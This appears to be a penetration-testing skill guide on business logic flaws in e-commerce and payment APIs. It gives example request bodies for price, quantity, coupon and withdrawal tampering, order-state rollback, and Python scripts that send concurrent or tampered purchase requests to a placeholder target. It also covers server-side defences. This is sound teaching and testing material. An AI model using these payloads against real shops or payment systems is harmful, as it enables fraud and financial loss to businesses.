Business Logic Vulnerability Testing

Overview

Business logic vulnerabilities are design flaws in an application's business processing flow, which may lead to unauthorized operations, data tampering, financial losses, etc. This skill provides methods for detecting, exploiting, and defending against business logic vulnerabilities.

Vulnerability Types

1. Workflow Bypass

Skip verification steps:

Directly access the final step
Modify step order
Repeat step execution

2. Price Manipulation

Negative Price:

Enter negative amount
Result in increased account balance

Price Tampering:

Modify frontend price
Modify price in API requests

3. Quantity Limit Bypass

Negative Quantity:

Enter negative number
May lead to increased inventory

Exceed Limit:

Modify quantity limit
Bypass via batch operations

4. Race Condition

Concurrent Requests:

Send multiple requests simultaneously
Bypass single-time limits

5. State Manipulation

State Rollback:

Change completed orders to pending payment
Modify order status

Testing Methods

1. Workflow Analysis

Identify business processes:

Registration process
Purchase process
Withdrawal process
Review process

Test step skipping:

Normal flow: Step 1 → Step 2 → Step 3
Test: Directly access Step 3
Test: Step 1 → Step 3 (skip Step 2)

2. Parameter Tampering

Modify key parameters:

http

POST /api/purchase
{
  "product_id": 123,
  "quantity": 1,
  "price": 100.00  # Modify to 0.01
}

Negative value testing:

json

{
  "quantity": -1,
  "price": -100.00
}

3. Concurrency Testing

Send requests simultaneously:

python

import threading
import requests

def purchase():
    requests.post('https://target.com/api/purchase', 
                  json={'product_id': 123, 'quantity': 1})

# Send 10 requests simultaneously
for i in range(10):
    threading.Thread(target=purchase).start()

4. State Modification

Modify order status:

http

PATCH /api/order/123
{
  "status": "completed"  # Modify to completed
}

Rollback status:

http

PATCH /api/order/123
{
  "status": "pending"  # Rollback from completed to pending payment
}

Exploitation Techniques

Price Manipulation

Negative Price:

json

{
  "product_id": 123,
  "price": -100.00,
  "quantity": 1
}

Modify frontend price:

javascript

// Frontend code
const price = 100.00;

// Modify to
const price = 0.01;

API Price Modification:

http

POST /api/checkout
{
  "items": [
    {
      "product_id": 123,
      "price": 0.01,  # Original price 100.00
      "quantity": 1
    }
  ]
}

Quantity Limit Bypass

Negative Quantity:

json

{
  "product_id": 123,
  "quantity": -10  # May lead to increased inventory
}

Exceed Limit:

json

{
  "product_id": 123,
  "quantity": 999999  # Exceed single purchase limit
}

Coupon Abuse

Reuse:

http

POST /api/checkout
{
  "coupon": "DISCOUNT50",
  "items": [...]
}

# Reuse the same coupon

Unactivated Coupon:

http

POST /api/checkout
{
  "coupon": "EXPIRED_COUPON",  # Use expired coupon
  "items": [...]
}

Withdrawal Vulnerability

Negative Withdrawal:

json

{
  "amount": -1000.00  # May lead to increased account balance
}

Exceed Balance:

json

{
  "amount": 999999.00  # Exceed account balance
}

Race Condition

Concurrent Purchase:

python

import threading
import requests

def buy():
    requests.post('https://target.com/api/purchase',
                  json={'product_id': 123, 'quantity': 1})

// Flash sale, concurrent requests
for i in range(100):
    threading.Thread(target=buy).start()

Bypass Techniques

Frontend Validation Bypass

Direct API Call:

Bypass frontend JavaScript validation
Send API requests directly

Modify Request:

Intercept with Burp Suite
Modify parameters and send

Status Code Analysis

Observe Responses:

200 OK - May be successful
400 Bad Request - Parameter error
403 Forbidden - Insufficient permissions
500 Internal Server Error - Server error

Error Message Exploitation

Extract information from error messages:

Error: "Insufficient balance, current balance: 100.00"
→ Can obtain account balance information

Tool Usage

Burp Suite

Use Repeater:

Intercept business requests
Modify key parameters
Observe responses

Use Intruder:

Mark parameters
Use payload list
Batch testing

Custom Script

python

import requests
import json

def test_price_manipulation():
    # Test price modification
    for price in [0.01, -100, 0, 999999]:
        data = {
            "product_id": 123,
            "price": price,
            "quantity": 1
        }
        response = requests.post('https://target.com/api/purchase',
                                json=data)
        print(f"Price {price}: {response.status_code}")

test_price_manipulation()

Verification and Reporting

Verification Steps

Confirm that business logic restrictions can be bypassed
Verify that unauthorized operations can be performed
Evaluate impact (financial loss, data tampering, etc.)
Record complete POC

Report Key Points

Vulnerability location and business process
Executable unauthorized operations
Complete exploitation steps and PoC
Fix recommendations (server-side validation, business rule checks, etc.)

Protection Measures

Recommended Solutions

Server-Side Validation

python

def process_purchase(product_id, quantity, price):
    # Get real price from database
    real_price = db.get_product_price(product_id)
    
    # Validate price
    if price != real_price:
        raise ValueError("Price mismatch")
    
    # Validate quantity
    if quantity <= 0:
        raise ValueError("Invalid quantity")
    
    # Process purchase
    process_order(product_id, quantity, real_price)

State Machine Validation

python

class OrderState:
    PENDING = "pending"
    PAID = "paid"
    SHIPPED = "shipped"
    COMPLETED = "completed"
    
    TRANSITIONS = {
        PENDING: [PAID],
        PAID: [SHIPPED],
        SHIPPED: [COMPLETED]
    }
    
    def can_transition(self, from_state, to_state):
        return to_state in self.TRANSITIONS.get(from_state, [])

Concurrency Control

python

import threading

lock = threading.Lock()

def process_order(order_id):
    with lock:
        # Check order status
        order = db.get_order(order_id)
        if order.status != 'pending':
            raise ValueError("Order already processed")
        
        # Process order
        process(order)

Business Rule Validation

python

def validate_business_rules(order):
    # Validate quantity limit
    if order.quantity > MAX_QUANTITY:
        raise ValueError("Quantity exceeds limit")
    
    # Validate price range
    if order.price <= 0:
        raise ValueError("Invalid price")
    
    # Validate inventory
    if order.quantity > get_stock(order.product_id):
        raise ValueError("Insufficient stock")

Audit Logs

python

def log_business_action(user_id, action, details):
    log_entry = {
        "user_id": user_id,
        "action": action,
        "details": details,
        "timestamp": datetime.now()
    }
    db.log_action(log_entry)

Notes

Only perform in authorized testing environments
Avoid causing actual impact on business
Note differences in different business processes
Pay attention to data consistency during testing

business-logic-testing

NPX Install

Tags

SKILL.md Content (Chinese)

Business Logic Vulnerability Testing

Overview

Vulnerability Types

1. Workflow Bypass

2. Price Manipulation

3. Quantity Limit Bypass

4. Race Condition

5. State Manipulation

Testing Methods

1. Workflow Analysis

2. Parameter Tampering

3. Concurrency Testing

4. State Modification

Exploitation Techniques

Price Manipulation

Quantity Limit Bypass

Coupon Abuse

Withdrawal Vulnerability

Race Condition

Bypass Techniques

Frontend Validation Bypass

Status Code Analysis

Error Message Exploitation

Tool Usage

Burp Suite

Custom Script

Verification and Reporting

Verification Steps

Report Key Points

Protection Measures

Recommended Solutions

Notes